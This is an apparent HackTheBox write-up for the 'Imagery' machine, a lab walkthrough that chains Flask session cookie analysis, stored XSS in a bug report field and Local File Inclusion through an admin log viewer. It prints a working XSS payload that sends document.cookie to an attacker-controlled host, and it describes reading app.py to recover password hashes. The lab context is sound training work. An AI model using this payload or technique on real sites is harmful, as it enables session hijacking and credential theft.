Imagery: HackTheBox Medium Box Writeup

Overview

Imagery is a Medium-rated Linux machine on HackTheBox that chains together several classic web vulnerabilities in a cool sequence: session token analysis, Cross-Site Scripting (XSS) for session hijacking, and Local File Inclusion (LFI) to pull sensitive files from the server. It's a great box for practising client-side attack techniques and understanding how chained vulnerabilities can escalate from a low-privilege user to full admin access.

Enumeration

An Nmap scan reveals two open ports: SSH (22) and an HTTP service on the non-standard port 8000, running Werkzeug 3.1.3 / Python 3.12.7 — a Python web framework commonly used with Flask. The site is an Image Gallery application that allows user registration and image uploads.

After registering an account and poking around, the application appears fairly sparse. However, diving into browser DevTools reveals something interesting: every navigation action triggers an auth_status request carrying a session token.

Session Token Analysis

The token format isn't a JWT, it's a Flask session cookie, identifiable by its characteristic dot-separated structure. The natural next step is attempting to crack the signing secret using flask-unsign against a wordlist. In this case the crack doesn't succeed, but the investigation reveals something arguably more useful: the cookie's HTTPOnly flag is set to False.

This means JavaScript running on the page can read the session cookie.. The precondition for a cookie-stealing XSS attack.

XSS — Session Hijacking

Digging through the application's JavaScript source in the DevTools Debugger exposes the full client-side codebase. A bug report submission field accepts user input that is never sanitised before being rendered. This is an example of a stored XSS vulnerability.

Injecting a payload into the bug report field that makes an outbound fetch request to an attacker-controlled HTTP server, with document.cookie appended as a query parameter, successfully exfiltrates the admin's session cookie when an admin reviews the report.

<img src=x onerror="fetch('http://<attacker_ip>:13337?p='+document.cookie)">

With the admin session cookie in hand, replacing your own cookie in the browser grants full administrative access to the application.

Local File Inclusion — Reading Server Files

With admin access, the admin panel includes a log file viewer. Watching the network requests in DevTools while using this feature reveals that it fetches files by passing a filename parameter directly to the server. More importantly with no apparent path restriction.

Modifying the filename parameter to point at arbitrary server paths enables Local File Inclusion. Since the application is Flask/Python, the main application file is almost certainly app.py. Fetching it returns the full source code, which contains a hardcoded user store with MD5-hashed passwords and admin credentials.

With those hashes cracked (MD5 is trivially reversible for weak passwords via tools like hashcat or online lookup), the path to SSH access as a privileged user, and ultimately to the flags, is open.